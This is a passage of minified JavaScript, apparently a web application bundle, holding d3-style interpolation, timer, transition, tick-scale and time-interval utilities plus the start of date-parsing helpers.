Array(e);for(c=0;c<e;++c)d=VA(a[c]),i[c]=d.r||0,n[c]=d.g||0,r[c]=d.b||0;return i=t(i),n=t(n),r=t(r),d.opacity=1,function(T){return d.r=i(T),d.g=n(T),d.b=r(T),d+""}}}function VH(t,a){var c,e=a?a.length:0,i=t?Math.min(e,t.length):0,n=new Array(i),r=new Array(e);for(c=0;c<i;++c)n[c]=HA(t[c],a[c]);for(;c<e;++c)r[c]=a[c];return function(d){for(c=0;c<i;++c)r[c]=n[c](d);return r}}function S4e(t,a){var e=new Date;return t=+t,a=+a,function(i){return e.setTime(t*(1-i)+a*i),e}}function Rm(t,a){return t=+t,a=+a,function(e){return t*(1-e)+a*e}}function k4e(t,a){var n,e={},i={};for(n in(null===t||"object"!=typeof t)&&(t={}),(null===a||"object"!=typeof a)&&(a={}),a)n in t?e[n]=HA(t[n],a[n]):i[n]=a[n];return function(r){for(n in e)i[n]=e[n](r);return i}}FH(function x4e(t){var a=t.length-1;return function(e){var i=e<=0?e=0:e>=1?(e=1,a-1):Math.floor(e*a),n=t[i],r=t[i+1];return LH((e-i/a)*a,i>0?t[i-1]:2*n-r,n,r,i<a-1?t[i+2]:2*r-n)}}),FH(function w4e(t){var a=t.length;return function(e){var i=Math.floor(((e%=1)<0?++e:e)*a);return LH((e-i/a)*a,t[(i+a-1)%a],t[i%a],t[(i+1)%a],t[(i+2)%a])}});var dI=/[-+]?(?:\d+\.?\d*|\.?\d+)(?:[eE][-+]?\d+)?/g,mI=new RegExp(dI.source,"g");function BH(t,a){var i,n,r,e=dI.lastIndex=mI.lastIndex=0,c=-1,d=[],T=[];for(t+="",a+="";(i=dI.exec(t))&&(n=mI.exec(a));)(r=n.index)>e&&(r=a.slice(e,r),d[c]?d[c]+=r:d[++c]=r),(i=i[0])===(n=n[0])?d[c]?d[c]+=n:d[++c]=n:(d[++c]=null,T.push({i:c,x:Rm(i,n)})),e=mI.lastIndex;return e<a.length&&(r=a.slice(e),d[c]?d[c]+=r:d[++c]=r),d.length<2?T[0]?function O4e(t){return function(a){return t(a)+""}}(T[0].x):function P4e(t){return function(){return t}}(a):(a=T.length,function(k){for(var Y,q=0;q<a;++q)d[(Y=T[q]).i]=Y.x(k);return d.join("")})}function N4e(t,a){a||(a=[]);var n,e=t?Math.min(a.length,t.length):0,i=a.slice();return function(r){for(n=0;n<e;++n)i[n]=t[n]*(1-r)+a[n]*r;return i}}function HA(t,a){var i,e=typeof a;return null==a||"boolean"===e?lI(a):("number"===e?Rm:"string"===e?(i=xg(a))?(a=i,BA):BH:a instanceof xg?BA:a instanceof Date?S4e:function L4e(t){return ArrayBuffer.isView(t)&&!(t instanceof DataView)}(a)?N4e:Array.isArray(a)?VH:"function"!=typeof a.valueOf&&"function"!=typeof a.toString||isNaN(a)?k4e:Rm)(t,a)}var UA,Ob,Z1=0,kb=0,Pb=0,qA=0,wg=0,GA=0,Nb="object"==typeof performance&&performance.now?performance:Date,qH="object"==typeof window&&window.requestAnimationFrame?window.requestAnimationFrame.bind(window):function(t){setTimeout(t,17)};function uI(){return wg||(qH(W4e),wg=Nb.now()+GA)}function W4e(){wg=0}function jA(){this._call=this._time=this._next=null}function GH(t,a,e){var i=new jA;return i.restart(t,a,e),i}function jH(){wg=(qA=Nb.now())+GA,Z1=kb=0;try{!function F4e(){uI(),++Z1;for(var a,t=UA;t;)(a=wg-t._time)>=0&&t._call.call(null,a),t=t._next;--Z1}()}finally{Z1=0,function B4e(){for(var t,e,a=UA,i=1/0;a;)a._call?(i>a._time&&(i=a._time),t=a,a=a._next):(e=a._next,a._next=null,a=t?t._next=e:UA=e);Ob=t,hI(i)}(),wg=0}}function V4e(){var t=Nb.now(),a=t-qA;a>1e3&&(GA-=a,qA=t)}function hI(t){Z1||(kb&&(kb=clearTimeout(kb)),t-wg>24?(t<1/0&&(kb=setTimeout(jH,t-Nb.now()-GA)),Pb&&(Pb=clearInterval(Pb))):(Pb||(qA=Nb.now(),Pb=setInterval(V4e,1e3)),Z1=1,qH(jH)))}function QH(t,a,e){var i=new jA;return i.restart(n=>{i.stop(),t(n+a)},a=null==a?0:+a,e),i}jA.prototype=GH.prototype={constructor:jA,restart:function(t,a,e){if("function"!=typeof t)throw new TypeError("callback is not a function");e=(null==e?uI():+e)+(null==a?0:+a),!this._next&&Ob!==this&&(Ob?Ob._next=this:UA=this,Ob=this),this._call=t,this._time=e,hI()},stop:function(){this._call&&(this._call=null,this._time=1/0,hI())}};var H4e=DH("start","end","cancel","interrupt"),U4e=[];function KA(t,a,e,i,n,r){var c=t.__transition;if(c){if(e in c)return}else t.__transition={};!function q4e(t,a,e){var n,i=t.__transition;function c(k){var q,Y,te,pe;if(1!==e.state)return T();for(q in i)if((pe=i[q]).name===e.name){if(3===pe.state)return QH(c);4===pe.state?(pe.state=6,pe.timer.stop(),pe.on.call("interrupt",t,t.__data__,pe.index,pe.group),delete i[q]):+q<a&&(pe.state=6,pe.timer.stop(),pe.on.call("cancel",t,t.__data__,pe.index,pe.group),delete i[q])}if(QH(function(){3===e.state&&(e.state=4,e.timer.restart(d,e.delay,e.time),d(k))}),e.state=2,e.on.call("start",t,t.__data__,e.index,e.group),2===e.state){for(e.state=3,n=new Array(te=e.tween.length),q=0,Y=-1;q<te;++q)(pe=e.tween[q].value.call(t,t.__data__,e.index,e.group))&&(n[++Y]=pe);n.length=Y+1}}function d(k){for(var q=k<e.duration?e.ease.call(null,k/e.duration):(e.timer.restart(T),e.state=5,1),Y=-1,te=n.length;++Y<te;)n[Y].call(t,q);5===e.state&&(e.on.call("end",t,t.__data__,e.index,e.group),T())}function T(){for(var k in e.state=6,e.timer.stop(),delete i[a],i)return;delete t.__transition}i[a]=e,e.timer=GH(function r(k){e.state=1,e.timer.restart(c,e.delay,e.time),e.delay<=k&&c(k-e.delay)},0,e.time)}(t,e,{name:a,index:i,group:n,on:H4e,tween:U4e,time:r.time,delay:r.delay,duration:r.duration,ease:r.ease,timer:null,state:0})}function _I(t,a){var e=Sm(t,a);if(e.state>0)throw new Error("too late; already scheduled");return e}function Ru(t,a){var e=Sm(t,a);if(e.state>3)throw new Error("too late; already running");return e}function Sm(t,a){var e=t.__transition;if(!e||!(e=e[a]))throw new Error("transition not found");return e}var XA,YH=180/Math.PI,CI={translateX:0,translateY:0,rotate:0,skewX:0,scaleX:1,scaleY:1};function JH(t,a,e,i,n,r){var c,d,T;return(c=Math.sqrt(t*t+a*a))&&(t/=c,a/=c),(T=t*e+a*i)&&(e-=t*T,i-=a*T),(d=Math.sqrt(e*e+i*i))&&(e/=d,i/=d,T/=d),t*i<a*e&&(t=-t,a=-a,T=-T,c=-c),{translateX:n,translateY:r,rotate:Math.atan2(a,t)*YH,skewX:Math.atan(T)*YH,scaleX:c,scaleY:d}}function ZH(t,a,e,i){function n(k){return k.length?k.pop()+" ":""}return function(k,q){var Y=[],te=[];return k=t(k),q=t(q),function r(k,q,Y,te,pe,Re){if(k!==Y||q!==te){var Fe=pe.push("translate(",null,a,null,e);Re.push({i:Fe-4,x:Rm(k,Y)},{i:Fe-2,x:Rm(q,te)})}else(Y||te)&&pe.push("translate("+Y+a+te+e)}(k.translateX,k.translateY,q.translateX,q.translateY,Y,te),function c(k,q,Y,te){k!==q?(k-q>180?q+=360:q-k>180&&(k+=360),te.push({i:Y.push(n(Y)+"rotate(",null,i)-2,x:Rm(k,q)})):q&&Y.push(n(Y)+"rotate("+q+i)}(k.rotate,q.rotate,Y,te),function d(k,q,Y,te){k!==q?te.push({i:Y.push(n(Y)+"skewX(",null,i)-2,x:Rm(k,q)}):q&&Y.push(n(Y)+"skewX("+q+i)}(k.skewX,q.skewX,Y,te),function T(k,q,Y,te,pe,Re){if(k!==Y||q!==te){var Fe=pe.push(n(pe)+"scale(",null,",",null,")");Re.push({i:Fe-4,x:Rm(k,Y)},{i:Fe-2,x:Rm(q,te)})}else(1!==Y||1!==te)&&pe.push(n(pe)+"scale("+Y+","+te+")")}(k.scaleX,k.scaleY,q.scaleX,q.scaleY,Y,te),k=q=null,function(pe){for(var Ne,Re=-1,Fe=te.length;++Re<Fe;)Y[(Ne=te[Re]).i]=Ne.x(pe);return Y.join("")}}}var $4e=ZH(function j4e(t){const a=new("function"==typeof DOMMatrix?DOMMatrix:WebKitCSSMatrix)(t+"");return a.isIdentity?CI:JH(a.a,a.b,a.c,a.d,a.e,a.f)},"px, ","px)","deg)"),K4e=ZH(function Q4e(t){return null!=t&&(XA||(XA=document.createElementNS("http://www.w3.org/2000/svg","g")),XA.setAttribute("transform",t),t=XA.transform.baseVal.consolidate())?JH((t=t.matrix).a,t.b,t.c,t.d,t.e,t.f):CI},", ",")",")");function X4e(t,a){var e,i;return function(){var n=Ru(this,t),r=n.tween;if(r!==e)for(var c=0,d=(i=e=r).length;c<d;++c)if(i[c].name===a){(i=i.slice()).splice(c,1);break}n.tween=i}}function Y4e(t,a,e){var i,n;if("function"!=typeof e)throw new Error;return function(){var r=Ru(this,t),c=r.tween;if(c!==i){n=(i=c).slice();for(var d={name:a,value:e},T=0,k=n.length;T<k;++T)if(n[T].name===a){n[T]=d;break}T===k&&n.push(d)}r.tween=n}}function yI(t,a,e){var i=t._id;return t.each(function(){var n=Ru(this,i);(n.value||(n.value={}))[a]=e.apply(this,arguments)}),function(n){return Sm(n,i).value[a]}}function eU(t,a){var e;return("number"==typeof a?Rm:a instanceof xg?BA:(e=xg(a))?(a=e,BA):BH)(t,a)}function Z4e(t){return function(){this.removeAttribute(t)}}function e3e(t){return function(){this.removeAttributeNS(t.space,t.local)}}function t3e(t,a,e){var i,r,n=e+"";return function(){var c=this.getAttribute(t);return c===n?null:c===i?r:r=a(i=c,e)}}function i3e(t,a,e){var i,r,n=e+"";return function(){var c=this.getAttributeNS(t.space,t.local);return c===n?null:c===i?r:r=a(i=c,e)}}function a3e(t,a,e){var i,n,r;return function(){var c,T,d=e(this);return null==d?void this.removeAttribute(t):(c=this.getAttribute(t))===(T=d+"")?null:c===i&&T===n?r:(n=T,r=a(i=c,d))}}function n3e(t,a,e){var i,n,r;return function(){var c,T,d=e(this);return null==d?void this.removeAttributeNS(t.space,t.local):(c=this.getAttributeNS(t.space,t.local))===(T=d+"")?null:c===i&&T===n?r:(n=T,r=a(i=c,d))}}function r3e(t,a){return function(e){this.setAttribute(t,a.call(this,e))}}function s3e(t,a){return function(e){this.setAttributeNS(t.space,t.local,a.call(this,e))}}function c3e(t,a){var e,i;function n(){var r=a.apply(this,arguments);return r!==i&&(e=(i=r)&&s3e(t,r)),e}return n._value=a,n}function l3e(t,a){var e,i;function n(){var r=a.apply(this,arguments);return r!==i&&(e=(i=r)&&r3e(t,r)),e}return n._value=a,n}function m3e(t,a){return function(){_I(this,t).delay=+a.apply(this,arguments)}}function u3e(t,a){return a=+a,function(){_I(this,t).delay=a}}function f3e(t,a){return function(){Ru(this,t).duration=+a.apply(this,arguments)}}function p3e(t,a){return a=+a,function(){Ru(this,t).duration=a}}function g3e(t,a){if("function"!=typeof a)throw new Error;return function(){Ru(this,t).ease=a}}function T3e(t,a,e){var i,n,r=function A3e(t){return(t+"").trim().split(/^|\s+/).every(function(a){var e=a.indexOf(".");return e>=0&&(a=a.slice(0,e)),!a||"start"===a})}(a)?_I:Ru;return function(){var c=r(this,t),d=c.on;d!==i&&(n=(i=d).copy()).on(a,e),c.on=n}}var R3e=wb.prototype.constructor;function tU(t){return function(){this.style.removeProperty(t)}}function z3e(t,a,e){return function(i){this.style.setProperty(t,a.call(this,i),e)}}function W3e(t,a,e){var i,n;function r(){var c=a.apply(this,arguments);return c!==n&&(i=(n=c)&&z3e(t,c,e)),i}return r._value=a,r}function U3e(t){return function(a){this.textContent=t.call(this,a)}}function q3e(t){var a,e;function i(){var n=t.apply(this,arguments);return n!==e&&(a=(e=n)&&U3e(n)),a}return i._value=t,i}var $3e=0;function ef(t,a,e,i){this._groups=t,this._parents=a,this._name=e,this._id=i}function iU(){return++$3e}var Ig=wb.prototype;ef.prototype=function K3e(t){return wb().transition(t)}.prototype={constructor:ef,select:function w3e(t){var a=this._name,e=this._id;"function"!=typeof t&&(t=iI(t));for(var i=this._groups,n=i.length,r=new Array(n),c=0;c<n;++c)for(var q,Y,d=i[c],T=d.length,k=r[c]=new Array(T),te=0;te<T;++te)(q=d[te])&&(Y=t.call(q,q.__data__,te,d))&&("__data__"in q&&(Y.__data__=q.__data__),k[te]=Y,KA(k[te],a,e,te,k,Sm(q,e)));return new ef(r,this._parents,a,e)},selectAll:function I3e(t){var a=this._name,e=this._id;"function"!=typeof t&&(t=dH(t));for(var i=this._groups,n=i.length,r=[],c=[],d=0;d<n;++d)for(var q,T=i[d],k=T.length,Y=0;Y<k;++Y)if(q=T[Y]){for(var pe,te=t.call(q,q.__data__,Y,T),Re=Sm(q,e),Fe=0,Ne=te.length;Fe<Ne;++Fe)(pe=te[Fe])&&KA(pe,a,e,Fe,te,Re);r.push(te),c.push(q)}return new ef(r,c,a,e)},filter:function M3e(t){"function"!=typeof t&&(t=mH(t));for(var a=this._groups,e=a.length,i=new Array(e),n=0;n<e;++n)for(var T,r=a[n],c=r.length,d=i[n]=[],k=0;k<c;++k)(T=r[k])&&t.call(T,T.__data__,k,r)&&d.push(T);return new ef(i,this._parents,this._name,this._id)},merge:function v3e(t){if(t._id!==this._id)throw new Error;for(var a=this._groups,e=t._groups,i=a.length,r=Math.min(i,e.length),c=new Array(i),d=0;d<r;++d)for(var te,T=a[d],k=e[d],q=T.length,Y=c[d]=new Array(q),pe=0;pe<q;++pe)(te=T[pe]||k[pe])&&(Y[pe]=te);for(;d<i;++d)c[d]=a[d];return new ef(c,this._parents,this._name,this._id)},selection:function S3e(){return new R3e(this._groups,this._parents)},transition:function j3e(){for(var t=this._name,a=this._id,e=iU(),i=this._groups,n=i.length,r=0;r<n;++r)for(var T,c=i[r],d=c.length,k=0;k<d;++k)if(T=c[k]){var q=Sm(T,a);KA(T,t,e,k,c,{time:q.time+q.delay+q.duration,delay:0,duration:q.duration,ease:q.ease})}return new ef(i,this._parents,t,e)},call:Ig.call,nodes:Ig.nodes,node:Ig.node,size:Ig.size,empty:Ig.empty,each:Ig.each,on:function E3e(t,a){var e=this._id;return arguments.length<2?Sm(this.node(),e).on.on(t):this.each(T3e(e,t,a))},attr:function o3e(t,a){var e=LA(t),i="transform"===e?K4e:eU;return this.attrTween(t,"function"==typeof a?(e.local?n3e:a3e)(e,i,yI(this,"attr."+t,a)):null==a?(e.local?e3e:Z4e)(e):(e.local?i3e:t3e)(e,i,a))},attrTween:function d3e(t,a){var e="attr."+t;if(arguments.length<2)return(e=this.tween(e))&&e._value;if(null==a)return this.tween(e,null);if("function"!=typeof a)throw new Error;var i=LA(t);return this.tween(e,(i.local?c3e:l3e)(i,a))},style:function L3e(t,a,e){var i="transform"==(t+="")?$4e:eU;return null==a?this.styleTween(t,function k3e(t,a){var e,i,n;return function(){var r=Y1(this,t),c=(this.style.removeProperty(t),Y1(this,t));return r===c?null:r===e&&c===i?n:n=a(e=r,i=c)}}(t,i)).on("end.style."+t,tU(t)):"function"==typeof a?this.styleTween(t,function O3e(t,a,e){var i,n,r;return function(){var c=Y1(this,t),d=e(this),T=d+"";return null==d&&(this.style.removeProperty(t),T=d=Y1(this,t)),c===T?null:c===i&&T===n?r:(n=T,r=a(i=c,d))}}(t,i,yI(this,"style."+t,a))).each(function N3e(t,a){var e,i,n,d,r="style."+a,c="end."+r;return function(){var T=Ru(this,t),k=T.on,q=null==T.value[r]?d||(d=tU(a)):void 0;(k!==e||n!==q)&&(i=(e=k).copy()).on(c,n=q),T.on=i}}(this._id,t)):this.styleTween(t,function P3e(t,a,e){var i,r,n=e+"";return function(){var c=Y1(this,t);return c===n?null:c===i?r:r=a(i=c,e)}}(t,i,a),e).on("end.style."+t,null)},styleTween:function F3e(t,a,e){var i="style."+(t+="");if(arguments.length<2)return(i=this.tween(i))&&i._value;if(null==a)return this.tween(i,null);if("function"!=typeof a)throw new Error;return this.tween(i,W3e(t,a,null==e?"":e))},text:function H3e(t){return this.tween("text","function"==typeof t?function B3e(t){return function(){var a=t(this);this.textContent=null==a?"":a}}(yI(this,"text",t)):function V3e(t){return function(){this.textContent=t}}(null==t?"":t+""))},textTween:function G3e(t){var a="text";if(arguments.length<1)return(a=this.tween(a))&&a._value;if(null==t)return this.tween(a,null);if("function"!=typeof t)throw new Error;return this.tween(a,q3e(t))},remove:function x3e(){return this.on("end.remove",function D3e(t){return function(){var a=this.parentNode;for(var e in this.__transition)if(+e!==t)return;a&&a.removeChild(this)}}(this._id))},tween:function J4e(t,a){var e=this._id;if(t+="",arguments.length<2){for(var c,i=Sm(this.node(),e).tween,n=0,r=i.length;n<r;++n)if((c=i[n]).name===t)return c.value;return null}return this.each((null==a?X4e:Y4e)(e,t,a))},delay:function h3e(t){var a=this._id;return arguments.length?this.each(("function"==typeof t?m3e:u3e)(a,t)):Sm(this.node(),a).delay},duration:function _3e(t){var a=this._id;return arguments.length?this.each(("function"==typeof t?f3e:p3e)(a,t)):Sm(this.node(),a).duration},ease:function C3e(t){var a=this._id;return arguments.length?this.each(g3e(a,t)):Sm(this.node(),a).ease},easeVarying:function b3e(t){if("function"!=typeof t)throw new Error;return this.each(function y3e(t,a){return function(){var e=a.apply(this,arguments);if("function"!=typeof e)throw new Error;Ru(this,t).ease=e}}(this._id,t))},end:function Q3e(){var t,a,e=this,i=e._id,n=e.size();return new Promise(function(r,c){var d={value:c},T={value:function(){0==--n&&r()}};e.each(function(){var k=Ru(this,i),q=k.on;q!==t&&((a=(t=q).copy())._.cancel.push(d),a._.interrupt.push(d),a._.end.push(T)),k.on=a}),0===n&&r()})},[Symbol.iterator]:Ig[Symbol.iterator]};var Y3e={time:null,delay:0,duration:250,ease:function X3e(t){return((t*=2)<=1?t*t*t:(t-=2)*t*t+2)/2}};function J3e(t,a){for(var e;!(e=t.__transition)||!(e=e[a]);)if(!(t=t.parentNode))throw new Error(`transition ${a} not found`);return e}wb.prototype.interrupt=function G4e(t){return this.each(function(){!function gI(t,a){var i,n,c,e=t.__transition,r=!0;if(e){for(c in a=null==a?null:a+"",e)(i=e[c]).name===a?(n=i.state>2&&i.state<5,i.state=6,i.timer.stop(),i.on.call(n?"interrupt":"cancel",t,t.__data__,i.index,i.group),delete e[c]):r=!1;r&&delete t.__transition}}(this,t)})},wb.prototype.transition=function Z3e(t){var a,e;t instanceof ef?(a=t._id,t=t._name):(a=iU(),(e=Y3e).time=uI(),t=null==t?null:t+"");for(var i=this._groups,n=i.length,r=0;r<n;++r)for(var T,c=i[r],d=c.length,k=0;k<d;++k)(T=c[k])&&KA(T,t,a,k,c,e||J3e(T,a));return new ef(i,this._parents,t,a)};Math;function Lb(t){return{type:t}}function DI(t,a){return t<a?-1:t>a?1:t>=a?0:NaN}function xI(t){let a=t,e=t;function i(c,d,T,k){for(null==T&&(T=0),null==k&&(k=c.length);T<k;){const q=T+k>>>1;e(c[q],d)<0?T=q+1:k=q}return T}return 1===t.length&&(a=(c,d)=>t(c)-d,e=function mAe(t){return(a,e)=>DI(t(a),e)}(t)),{left:i,center:function r(c,d,T,k){null==T&&(T=0),null==k&&(k=c.length);const q=i(c,d,T,k-1);return q>T&&a(c[q-1],d)>-a(c[q],d)?q-1:q},right:function n(c,d,T,k){for(null==T&&(T=0),null==k&&(k=c.length);T<k;){const q=T+k>>>1;e(c[q],d)>0?k=q:T=q+1}return T}}}["w","e"].map(Lb),["n","s"].map(Lb),["n","w","e","s","nw","ne","sw","se"].map(Lb);var wI=Math.sqrt(50),II=Math.sqrt(10),RI=Math.sqrt(2);function cU(t,a,e){var i=(a-t)/Math.max(0,e),n=Math.floor(Math.log(i)/Math.LN10),r=i/Math.pow(10,n);return n>=0?(r>=wI?10:r>=II?5:r>=RI?2:1)*Math.pow(10,n):-Math.pow(10,-n)/(r>=wI?10:r>=II?5:r>=RI?2:1)}function SI(t,a,e){var i=Math.abs(a-t)/Math.max(0,e),n=Math.pow(10,Math.floor(Math.log(i)/Math.LN10)),r=i/n;return r>=wI?n*=10:r>=II?n*=5:r>=RI&&(n*=2),a<t?-n:n}const af=1e3,Wd=6e4,nf=60*Wd,Rg=24*nf,kI=7*Rg,lU=30*Rg,PI=365*Rg;var OI=new Date,NI=new Date;function $s(t,a,e,i){function n(r){return t(r=0===arguments.length?new Date:new Date(+r)),r}return n.floor=function(r){return t(r=new Date(+r)),r},n.ceil=function(r){return t(r=new Date(r-1)),a(r,1),t(r),r},n.round=function(r){var c=n(r),d=n.ceil(r);return r-c<d-r?c:d},n.offset=function(r,c){return a(r=new Date(+r),null==c?1:Math.floor(c)),r},n.range=function(r,c,d){var k,T=[];if(r=n.ceil(r),d=null==d?1:Math.floor(d),!(r<c&&d>0))return T;do{T.push(k=new Date(+r)),a(r,d),t(r)}while(k<r&&r<c);return T},n.filter=function(r){return $s(function(c){if(c>=c)for(;t(c),!r(c);)c.setTime(c-1)},function(c,d){if(c>=c)if(d<0)for(;++d<=0;)for(;a(c,-1),!r(c););else for(;--d>=0;)for(;a(c,1),!r(c););})},e&&(n.count=function(r,c){return OI.setTime(+r),NI.setTime(+c),t(OI),t(NI),Math.floor(e(OI,NI))},n.every=function(r){return r=Math.floor(r),isFinite(r)&&r>0?r>1?n.filter(i?function(c){return i(c)%r==0}:function(c){return n.count(0,c)%r==0}):n:null}),n}var ZA=$s(function(){},function(t,a){t.setTime(+t+a)},function(t,a){return a-t});ZA.every=function(t){return t=Math.floor(t),isFinite(t)&&t>0?t>1?$s(function(a){a.setTime(Math.floor(a/t)*t)},function(a,e){a.setTime(+a+e*t)},function(a,e){return(e-a)/t}):ZA:null};const hAe=ZA;const zb=$s(function(t){t.setTime(t-t.getMilliseconds())},function(t,a){t.setTime(+t+a*af)},function(t,a){return(a-t)/af},function(t){return t.getUTCSeconds()});const uU=$s(function(t){t.setTime(t-t.getMilliseconds()-t.getSeconds()*af)},function(t,a){t.setTime(+t+a*Wd)},function(t,a){return(a-t)/Wd},function(t){return t.getMinutes()});const fU=$s(function(t){t.setTime(t-t.getMilliseconds()-t.getSeconds()*af-t.getMinutes()*Wd)},function(t,a){t.setTime(+t+a*nf)},function(t,a){return(a-t)/nf},function(t){return t.getHours()});const eT=$s(t=>t.setHours(0,0,0,0),(t,a)=>t.setDate(t.getDate()+a),(t,a)=>(a-t-(a.getTimezoneOffset()-t.getTimezoneOffset())*Wd)/Rg,t=>t.getDate()-1);function Sg(t){return $s(function(a){a.setDate(a.getDate()-(a.getDay()+7-t)%7),a.setHours(0,0,0,0)},function(a,e){a.setDate(a.getDate()+7*e)},function(a,e){return(e-a-(e.getTimezoneOffset()-a.getTimezoneOffset())*Wd)/kI})}var tT=Sg(0),iT=Sg(1),a2=(Sg(2),Sg(3),Sg(4));const gU=(Sg(5),Sg(6),$s(function(t){t.setDate(1),t.setHours(0,0,0,0)},function(t,a){t.setMonth(t.getMonth()+a)},function(t,a){return a.getMonth()-t.getMonth()+12*(a.getFullYear()-t.getFullYear())},function(t){return t.getMonth()}));var LI=$s(function(t){t.setMonth(0,1),t.setHours(0,0,0,0)},function(t,a){t.setFullYear(t.getFullYear()+a)},function(t,a){return a.getFullYear()-t.getFullYear()},function(t){return t.getFullYear()});LI.every=function(t){return isFinite(t=Math.floor(t))&&t>0?$s(function(a){a.setFullYear(Math.floor(a.getFullYear()/t)*t),a.setMonth(0,1),a.setHours(0,0,0,0)},function(a,e){a.setFullYear(a.getFullYear()+e*t)}):null};const kg=LI;const CAe=$s(function(t){t.setUTCSeconds(0,0)},function(t,a){t.setTime(+t+a*Wd)},function(t,a){return(a-t)/Wd},function(t){return t.getUTCMinutes()});const yAe=$s(function(t){t.setUTCMinutes(0,0,0)},function(t,a){t.setTime(+t+a*nf)},function(t,a){return(a-t)/nf},function(t){return t.getUTCHours()});const zI=$s(function(t){t.setUTCHours(0,0,0,0)},function(t,a){t.setUTCDate(t.getUTCDate()+a)},function(t,a){return(a-t)/Rg},function(t){return t.getUTCDate()-1});function Pg(t){return $s(function(a){a.setUTCDate(a.getUTCDate()-(a.getUTCDay()+7-t)%7),a.setUTCHours(0,0,0,0)},function(a,e){a.setUTCDate(a.getUTCDate()+7*e)},function(a,e){return(e-a)/kI})}var WI=Pg(0),aT=Pg(1),n2=(Pg(2),Pg(3),Pg(4));const TAe=(Pg(5),Pg(6),$s(function(t){t.setUTCDate(1),t.setUTCHours(0,0,0,0)},function(t,a){t.setUTCMonth(t.getUTCMonth()+a)},function(t,a){return a.getUTCMonth()-t.getUTCMonth()+12*(a.getUTCFullYear()-t.getUTCFullYear())},function(t){return t.getUTCMonth()}));var FI=$s(function(t){t.setUTCMonth(0,1),t.setUTCHours(0,0,0,0)},function(t,a){t.setUTCFullYear(t.getUTCFullYear()+a)},function(t,a){return a.getUTCFullYear()-t.getUTCFullYear()},function(t){return t.getUTCFullYear()});FI.every=function(t){return isFinite(t=Math.floor(t))&&t>0?$s(function(a){a.setUTCFullYear(Math.floor(a.getUTCFullYear()/t)*t),a.setUTCMonth(0,1),a.setUTCHours(0,0,0,0)},function(a,e){a.setUTCFullYear(a.getUTCFullYear()+e*t)}):null};const o2=FI;function vU(t,a,e,i,n,r){const c=[[zb,1,af],[zb,5,5e3],[zb,15,15e3],[zb,30,3e4],[r,1,Wd],[r,5,5*Wd],[r,15,15*Wd],[r,30,30*Wd],[n,1,nf],[n,3,3*nf],[n,6,6*nf],[n,12,12*nf],[i,1,Rg],[i,2,2*Rg],[e,1,kI],[a,1,lU],[a,3,3*lU],[t,1,PI]];function T(k,q,Y){const te=Math.abs(q-k)/Y,pe=xI(([,,Ne])=>Ne).right(c,te);if(pe===c.length)return t.every(SI(k/PI,q/PI,Y));if(0===pe)return hAe.every(Math.max(SI(k,q,Y),1));const[Re,Fe]=c[te/c[pe-1][2]<c[pe][2]/te?pe-1:pe];return Re.every(Fe)}return[function d(k,q,Y){const te=q<k;te&&([k,q]=[q,k]);const pe=Y&&"function"==typeof Y.range?Y:T(k,q,Y),Re=pe?pe.range(k,+q+1):[];return te?Re.reverse():Re},T]}const[Gwt,jwt]=vU(o2,TAe,WI,zI,yAe,CAe),[EAe,DAe]=vU(kg,gU,tT,eT,fU,uU);function VI(t){if(0<=t.y&&t.y<100){var a=new Date(-1,t.m,t.d,t.H,t.M,t.S,t.L);return a.setFullYear(t.y),a}return new Date(t.y,t.m,t.d,t.H,t.M,t.S,t.L)}function BI(t){if(0<=t.y&&t.y<100){var a=new Date(Date.UTC(-1,t.m,t.d,t.H,t.M,t.S,t.L));return a.setUTCFullYear(t.y),a}return new Date(Date.UTC(t.y,t.m,t.d,t.H,t.M,t.S,t.L))}function Wb(t,a,e){return{y:t,m:a,d:e,H:0,M:0,S:0,L:0}}var AU={"-":"",_:" ",0:"0"},Ks=/^\s*\d+/,wAe=/^%/,IAe=/[\\^$*+?|[\]().{}]/g;function No(t,a,e){var i=t<0?"-":"",n=(i?-t:t)+"",r=n.length;return i+(r<e?new Array(e-r+1).join(a)+n:n)}function RAe(t){return t.replace(IAe,"\\$&")}function Fb(t){return new RegExp("^(?:"+t.map(RAe).join("|")+")","i")}function Vb(t){return new Map(t.map((a,e)=>[a.toLowerCase(),e]))}function SAe(t,a,e){var i=Ks.exec(a.slice(e,e+1));return i?(t.w=+i[0],e+i[0].length):-1}function kAe(t,a,e){var i=Ks.exec(a.slice(e,e+1));return i?(t.u=+i[0],e+i[0].length):-1}function PAe(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.U=+i[0],e+i[0].length):-1}function OAe(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.V=+i[0],e+i[0].length):-1}function NAe(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.W=+i[0],e+i[0].length):-1}function TU(t,a,e){var i=Ks.exec(a.slice(e,e+4));return i?(t.y=+i[0],e+i[0].length):-1}function EU(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.y=+i[0]+(+i[0]>68?1900:2e3),e+i[0].length):-1}function LAe(t,a,e){var i=/^(Z)|([+-]\d\d)(?::?(\d\d))?/.exec(a.slice(e,e+6));return i?(t.Z=i[1]?0:-(i[2]+(i[3]||"00")),e+i[0].length):-1}function zAe(t,a,e){var i=Ks.exec(a.slice(e,e+1));return i?(t.q=3*i[0]-3,e+i[0].length):-1}function WAe(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.m=i[0]-1,e+i[0].length):-1}function DU(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.d=+i[0],e+i[0].length):-1}function FAe(t,a,e){var i=Ks.exec(a.slice(e,e+3));return i?(t.m=0,t.d=+i[0],e+i[0].length):-1}function xU(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.H=+i[0],e+i[0].length):-1}function VAe(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.M=+i[0],e+i[0].length):-1}function BAe(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.S=+i[0],e+i[0].length):-1}function HAe(t,a,e){var i=Ks.exec(a.slice(e,e+3));return i?(t.L=+i[0],e+i[0].length):-1}function UAe(t,a,e){var i=Ks.exec(a.slice(e,e+6));return i?(t.L=Math.floor(i[0]/1e3),e+i[0].length):-1}function qAe(t,a,e){var i=wAe.exec(a.slice(e,e+1));return i?e+i[0].length:-1}function GAe(t,a,e){var i=Ks.exec(a.slice(e));return i?(t.Q=+i[0],e+i[0].length):-1}function jAe(t,a,e){var i=Ks.exec(a.slice(e));return i?(t.s=+i[0],e+i[0].length):-1}function wU(t,a){return No(t.getDate(),a,2)}function QAe(t,a){return No(t.getHours(),a,2)}function $Ae(t,a){return No(t.getHours()%12||12,a,2)}function 